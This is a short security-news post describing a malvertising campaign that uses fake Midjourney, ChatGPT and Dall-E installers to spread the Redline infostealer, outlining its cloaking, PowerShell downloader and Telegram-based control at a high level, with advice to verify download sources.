HQ/EMEAFind out how we can help your business
Recently, a malicious advertising campaign has utilised the Google Search engine to spread the Redline stealer using AI-generated tools like Midjourney and ChatGPT. The sudden popularity of Artificial Intelligence-based end-user tools has increased dramatically this year. The popularity of such tools has attracted numerous cybercriminals since they could exploit the popularity and infect multiple users with their malicious kits.
Researchers revealed that there is an ongoing malicious ad campaign that endorses fake Midjourney installer. Midjourney is an AI tool that can generate images through instructions provided by a user using natural language.
The campaign portrays SEO-poisoned search results for the keyword that will redirect unsuspecting users to compromised websites and download Redline Stealer.
Next, the malicious website will send the user’s IP address to the backend server after clicking the ads. Once the IP address belongs to a web-crawling bot or the user is visiting the link manually and typing it, a non-infectious domain version will appear and avoid security detections and analysis.
On the other hand, if the users visit the site through malicious ads, the site will offer a compromised executable that pretends to be the desktop version of Midjourney. Researchers noted that the legitimate Midjourney tool would only be available through the web version.
The Redline Stealer will start its malicious capabilities after executing the bait.
A malicious PowerShell script will run in the background when the malicious installer that stores the Redline Stealer operates. Next, it displays a fake installation window not to raise suspicion.
Subsequently, the script downloads the Redline Stealer from a server and runs it on the infected device. The infostealer will then harvest and exfiltrate sensitive data, such as web cookies, credentials, file details, and crypto wallet information.
Recent investigations also revealed that the cybercriminal campaign utilises the Telegram API for its command-and-control communication to bypass security protocols. In addition, some malware strains that use the same campaign leverage fake ChatGPT and Dall-E pages.
Threat actors have been exploiting the current trend of AI-based tools since these utility applications have hooked more users. Experts stated that it is essential to be knowledgeable about spotting legitimate and illegitimate applications.
Users should double-check the legitimacy of a source to avoid installing malicious apps that could contain malware.
